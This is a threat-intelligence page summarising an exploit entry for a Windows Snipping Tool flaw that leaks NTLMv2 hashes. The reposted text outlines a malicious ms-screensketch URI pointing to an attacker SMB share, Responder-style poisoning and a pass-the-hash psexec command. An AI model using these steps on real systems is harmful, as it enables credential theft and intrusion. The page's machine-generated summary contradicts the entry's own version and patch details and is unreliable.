Windows Snipping Tool - NTLMv2 Hash Hijack
This is an exploit targeting the Windows Snipping Tool that involves hijacking NTLMv2 hashes. The exploit code is available in text format. No specific affected versions or patch information is provided. The threat is assessed as medium severity based on available information.
AI Analysis
Technical Summary
The exploit leverages a vulnerability in the Windows Snipping Tool to hijack NTLMv2 hashes. No detailed technical information or affected versions are specified. Exploit code is publicly available in text format, but no vendor patch or official remediation guidance is provided.
Potential Impact
Potential unauthorized access or credential theft via NTLMv2 hash hijacking when using the Windows Snipping Tool. The exact impact scope is unclear due to limited details. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or guidance are available, exercise caution when using the Windows Snipping Tool in untrusted environments.
Indicators of Compromise
- exploit-code: # Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack # Date: 2026-04-22 # Exploit Author: nu11secur1ty # Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398 # Vendor Homepage: https://www.microsoft.com # Software Link: Built-in Windows Snipping Tool # Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch) # Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1 # CVE: CVE-2026-33829 # Attack Type: Remote / Network-based # Impact: Credential Theft (NTLMv2 Hash) / Pass-the-Hash # CVSS Score: 4.3 (Medium) but HIGH impact in practice ## Vulnerable Systems - Windows 10 (all versions before April 14, 2026 patch) - Windows 11 (all versions before April 14, 2026 patch) - Windows Server 2012, 2016, 2019, 2022, 2025 (before April 14, 2026 patch) ## Description A vulnerability in Windows Snipping Tool (CVE-2026-33829) allows attackers to force NTLMv2 authentication to a remote SMB server via crafted ms-screensketch:edit URI. When a victim clicks a malicious link and approves the "Open Snipping Tool" prompt, Windows automatically sends the user's NTLMv2 hash to the attacker-controlled server. This exploit extends beyond the original PoC by also harvesting HTTP NTLM hashes (via WPAD), LLMNR, and MDNS poisoning - capturing MULTIPLE valid hashes from a SINGLE click. Captured hashes can be used for Pass-the-Hash attacks or cracked with Hashcat. ## Exploit Features (nu11secur1ty edition) - ✅ Snipping Tool NTLM hash capture (original vector) - ✅ Automatic HTTP NTLM authentication capture (additional vector) - ✅ WPAD poisoning (automatic proxy config) - ✅ LLMNR/MDNS poisoning (fallback vectors) - ✅ Multi-harvest - captures multiple hashes from one click - ✅ One-command execution (sudo python3 exploit.py) - ✅ Auto-detects terminal and opens Responder in new window - ✅ Built-in HTTP server for HTML delivery ## Proof of Concept **Video Demonstration (Patreon Exclusive):** https://www.patreon.com/posts/cve-2026-33829-156243398 1. Run exploit on attacker machine (Kali Linux): sudo python3 CVE-2026-33829-NTLMv2-Hash-Hijack.py 2. Victim (Windows 11) opens the malicious URL: http://<ATTACKER_IP>/exploit.html 3. Victim clicks the button and approves "Open Snipping Tool" 4. Attacker captures NTLMv2 hash(es): [HTTP] NTLMv2 Username : \Hacked [HTTP] NTLMv2 Hash : Hacked:::157e1f851f7c17e7:16D87BC0AD284FB6... 5. Attacker performs Pass-the-Hash to gain access: impacket-psexec -hashes :<HASH> Hacked@<VICTIM_IP> ## Attack Vector ms-screensketch:edit?filePath=\\<ATTACKER_IP>\test\evil.png ## Requirements Attacker: Kali Linux (or any Linux with Python3, impacket, responder) Victim: Windows 10/11 with Snipping Tool (unpatched) ## Mitigations - Apply Microsoft patch from April 14, 2026 - Block outbound SMB traffic (port 445) - Disable NTLMv1 and restrict NTLMv2 via GPO - Educate users not to click "Open Snipping Tool" prompts from untrusted sources ## References - https://cybersecuritynews.com/windows-snipping-tool-vulnerability/ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33829 - https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2026-33829 ## Exploit Code (NFO) The exploit will not be published for security reasons! For more information, please get in touch with me! -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Windows Snipping Tool - NTLMv2 Hash Hijack
Description
This is an exploit targeting the Windows Snipping Tool that involves hijacking NTLMv2 hashes. The exploit code is available in text format. No specific affected versions or patch information is provided. The threat is assessed as medium severity based on available information.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The exploit leverages a vulnerability in the Windows Snipping Tool to hijack NTLMv2 hashes. No detailed technical information or affected versions are specified. Exploit code is publicly available in text format, but no vendor patch or official remediation guidance is provided.
Potential Impact
Potential unauthorized access or credential theft via NTLMv2 hash hijacking when using the Windows Snipping Tool. The exact impact scope is unclear due to limited details. No known exploits in the wild have been reported.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until official fixes or guidance are available, exercise caution when using the Windows Snipping Tool in untrusted environments.
Technical Details
- Edb Id
- 52567
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Windows Snipping Tool - NTLMv2 Hash Hijack
# Exploit Title: Windows Snipping Tool - NTLMv2 Hash Hijack # Date: 2026-04-22 # Exploit Author: nu11secur1ty # Video Demo: https://www.patreon.com/posts/cve-2026-33829-156243398 # Vendor Homepage: https://www.microsoft.com # Software Link: Built-in Windows Snipping Tool # Version: Windows 10, Windows 11, Windows Server 2012-2025 (pre-April 2026 patch) # Tested on: Windows 11 Pro (Build 22621) / Kali Linux 2026.1 # CVE: CVE-2026-33829 # Attack Type: Remote / Network-based # Impact: Credential... (3231 more characters)
Threat ID: 6a084e9bec166c07b0dd9363
Added to database: 5/16/2026, 11:01:47 AM
Last enriched: 5/16/2026, 11:01:50 AM
Last updated: 5/17/2026, 6:35:19 AM
Views: 16
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.